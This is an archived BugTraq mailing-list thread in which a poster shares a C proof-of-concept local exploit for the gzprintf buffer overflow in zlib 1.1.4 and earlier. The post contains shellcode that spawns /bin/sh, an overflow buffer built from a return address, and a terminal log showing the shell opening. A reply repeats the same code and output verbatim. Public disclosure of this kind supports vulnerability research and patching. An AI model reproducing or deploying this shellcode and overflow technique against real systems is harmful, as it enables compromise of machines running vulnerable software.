BugTraq
Back to list
|
Post reply
poc zlib sploit just for fun :)
Feb 23 2003 06:38PM
Crazy Einstein (crazy_einstein yahoo com)
(1 replies)
/*
\ PoC local exploit for zlib <= 1.1.4
/ just for fun..not for root :)
/ Usage: gcc -o zlib zlib.c -lz
/ by CrZ [crazy_einstein (at) yahoo (dot) com [email concealed]] lbyte
[lbyte.void.ru]
*/
#include <zlib.h>
#include <errno.h>
#include <stdio.h>
int main(int argc, char **argv) {
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
gzFile f;
int ret;
long xret;
char cret[10];
char badbuff[10000];
int i;
sprintf(badbuff,"%p",shell);
sscanf(badbuff,"0x%x",&xret);
printf("[>] exploiting...\n");
if(!(f = gzopen("/dev/null", "w"))) {
perror("/dev/null");
exit(1);
}
printf("[>] xret = 0x%x\n",xret);
sprintf(cret,"%c%c%c%c",(xret&0xff)+4,(xret>>8)&0xff,
(xret>>16)&0xff,(xret>>24)&0xff);
bzero(badbuff,sizeof(badbuff));
for(i=0;i<5000;i+=4) strcat(badbuff,cret);
setuid(0);
setgid(0);
ret = gzprintf(stderr, "%s", badbuff );
setuid(0);
setgid(0);
printf(">Sent!..\n");
printf("gzprintf -> %d\n", ret);
ret = gzclose(f);
printf("gzclose -> %d [%d]\n", ret, errno);
exit(0);
}
[crz@blacksand crz]$ gcc -o zlib zlib.c -lz
[crz@blacksand crz]$ ./zlib
[>] exploiting...
[>] xret = 0xbffff8f0
sh-2.05b$ exit
exit
[crz@blacksand crz]$
__________________________________________________
Do you Yahoo!?
Yahoo! Tax Center - forms, calculators, tips, more
http://taxes.yahoo.com/
[ reply ]
Re: poc zlib sploit just for fun :)
Feb 24 2003 11:51PM
Kelledin kelledin+BTQ (at) skarpsey.dyndns (dot) org [email concealed] (kelledin+BTQ skarpsey dyndns org)
Privacy Statement
Copyright 2010, SecurityFocus
/*
\ PoC local exploit for zlib <= 1.1.4
/ just for fun..not for root :)
/ Usage: gcc -o zlib zlib.c -lz
/ by CrZ [crazy_einstein (at) yahoo (dot) com [email concealed]] lbyte
[lbyte.void.ru]
*/
#include <zlib.h>
#include <errno.h>
#include <stdio.h>
int main(int argc, char **argv) {
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
gzFile f;
int ret;
long xret;
char cret[10];
char badbuff[10000];
int i;
sprintf(badbuff,"%p",shell);
sscanf(badbuff,"0x%x",&xret);
printf("[>] exploiting...\n");
if(!(f = gzopen("/dev/null", "w"))) {
perror("/dev/null");
exit(1);
}
printf("[>] xret = 0x%x\n",xret);
sprintf(cret,"%c%c%c%c",(xret&0xff)+4,(xret>>8)&0xff,
(xret>>16)&0xff,(xret>>24)&0xff);
bzero(badbuff,sizeof(badbuff));
for(i=0;i<5000;i+=4) strcat(badbuff,cret);
setuid(0);
setgid(0);
ret = gzprintf(stderr, "%s", badbuff );
setuid(0);
setgid(0);
printf(">Sent!..\n");
printf("gzprintf -> %d\n", ret);
ret = gzclose(f);
printf("gzclose -> %d [%d]\n", ret, errno);
exit(0);
}
[crz@blacksand crz]$ gcc -o zlib zlib.c -lz
[crz@blacksand crz]$ ./zlib
[>] exploiting...
[>] xret = 0xbffff8f0
sh-2.05b$ exit
exit
[crz@blacksand crz]$
__________________________________________________
Do you Yahoo!?
Yahoo! Tax Center - forms, calculators, tips, more
http://taxes.yahoo.com/
[ reply ]